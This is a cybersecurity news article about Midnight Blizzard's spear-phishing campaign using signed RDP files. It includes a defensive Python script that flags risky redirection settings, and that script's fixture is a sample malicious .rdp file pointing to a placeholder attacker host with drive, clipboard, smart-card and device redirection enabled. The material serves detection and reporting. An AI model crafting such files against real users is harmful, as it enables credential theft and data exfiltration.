Massive Midnight Blizzard Phishing Attack Strikes with Weaponized RDP Files

Russian threat actor Midnight Blizzard is running an ongoing, targeted spear-phishing campaign against government, academia, and other sectors, most likely for intelligence gathering, underscoring the persistent threat posed by sophisticated cyber operations.

The campaign, which targeted multiple organizations, delivered RDP configuration files disguised as legitimate messages from Microsoft; when opened, these files redirected the victim's connection to a malicious server controlled by the attacker.

Midnight Blizzard employed a novel access vector, a signed RDP configuration file, to compromise targets' devices; the activity overlaps with that tracked as UAC-0215 and with similar incidents reported by Amazon.

Midnight Blizzard, also tracked as APT29, is a Russian SVR-linked threat actor that has targeted governments, diplomatic entities, NGOs, and IT service providers in the US and Europe since 2018, using sophisticated techniques to compromise accounts and authentication mechanisms for long-term intelligence gathering.

APT29 is a persistent threat actor that leverages diverse techniques such as phishing, stolen credentials, and supply chain attacks to gain initial access, and it has frequently targeted AD FS with the FOGGYWEB and MAGICWEB malware.

Microsoft has detected the activity, is actively notifying targeted customers of the nation-state cyberattacks, and has published security guidance, including IOCs, hunting queries, and detection details, to help organizations mitigate this threat.

In this campaign, Midnight Blizzard sent highly targeted emails to thousands of users, using social engineering lures themed around Microsoft, AWS, and Zero Trust to trick recipients into downloading and executing malicious RDP configuration files.

Malicious remote connection

Once opened, the malicious RDP attachment connected the target system to the attacker's server and granted bidirectional access to local resources such as hard drives, the clipboard, printers, and authentication credentials, which enabled malware installation, RAT deployment, and potential credential exposure.

The connection exposed sensitive information from the target system, including file systems, network drives, peripherals, authentication credentials, clipboard data, and point-of-sale (POS) devices, enabling potential data exfiltration and unauthorized system access.
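The resource exposure described above is driven by redirection settings inside the .rdp file itself. As an added illustration (not code from this article or from Microsoft's advisory), the following triage script parses a .rdp configuration file in the standard "name:type:value" layout and flags the redirection settings that hand local resources to the remote server; the sample file, the allowlisted host, and the attacker host name are constructed placeholders, not indicators from the campaign.

```python
from typing import Dict, List, Tuple

# Constructed sample .rdp file (placeholder host, placeholder signature).
SAMPLE_RDP = """screen mode id:i:2
full address:s:rdp.example-attacker.invalid:3389
remoteapplicationmode:i:0
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
redirectsmartcards:i:1
redirectcomports:i:1
devicestoredirect:s:*
enablecredsspsupport:i:1
signscope:s:Full Address,Drives To Redirect
signature:s:constructed-placeholder-signature
"""

# Settings that redirect local resources to the remote server:
# name -> (predicate on the value that means "enabled", what gets exposed).
RISKY_SETTINGS = {
    "drivestoredirect":   (lambda v: v.strip() != "", "local drives / file system"),
    "devicestoredirect":  (lambda v: v.strip() != "", "plug-and-play devices (e.g. POS hardware)"),
    "redirectclipboard":  (lambda v: v.strip() == "1", "clipboard contents"),
    "redirectprinters":   (lambda v: v.strip() == "1", "printers"),
    "redirectsmartcards": (lambda v: v.strip() == "1", "smart cards / authentication tokens"),
    "redirectcomports":   (lambda v: v.strip() == "1", "serial (COM) ports"),
}

def parse_rdp(text: str) -> Dict[str, Tuple[str, str]]:
    """Parse name:type:value lines into {name: (type, value)}; malformed lines are ignored."""
    settings: Dict[str, Tuple[str, str]] = {}
    for line in text.splitlines():
        parts = line.split(":", 2)
        if len(parts) == 3 and parts[1] in ("i", "s", "b"):
            settings[parts[0].strip().lower()] = (parts[1], parts[2])
    return settings

def assess_rdp(text: str, allowed_hosts: List[str]) -> List[str]:
    """Return findings a defender should review; an empty list means nothing was flagged."""
    s = parse_rdp(text)
    findings: List[str] = []
    host = s.get("full address", ("s", ""))[1].rsplit(":", 1)[0]  # strip :port (IPv4/hostnames)
    if host and host.lower() not in [h.lower() for h in allowed_hosts]:
        findings.append(f"connects to non-allowlisted host {host}")
    for name, (is_enabled, exposed) in RISKY_SETTINGS.items():
        if name in s and is_enabled(s[name][1]):
            findings.append(f"{name}={s[name][1]} exposes {exposed} to the remote server")
    if "signature" in s:
        findings.append("file is signed: a signature suppresses the unknown-publisher prompt, not the risk")
    return findings
```

Running `assess_rdp(SAMPLE_RDP, ["rdp.corp.example.com"])` on the constructed file yields eight findings: the non-allowlisted host, all six redirection settings, and the presence of a signature.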

Midnight Blizzard phishing campaigns have been observed targeting specific sectors such as government, education, defense, and NGOs across several countries and regions, notably the UK, Europe, Australia, and Japan.

The actor also sent phishing emails from the email addresses of previously compromised legitimate organizations, using the domains listed in the IOC section to carry out the campaign.

Kaaviya (https://cyberpress.org/)
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She covers various cyber security incidents happening in cyberspace.
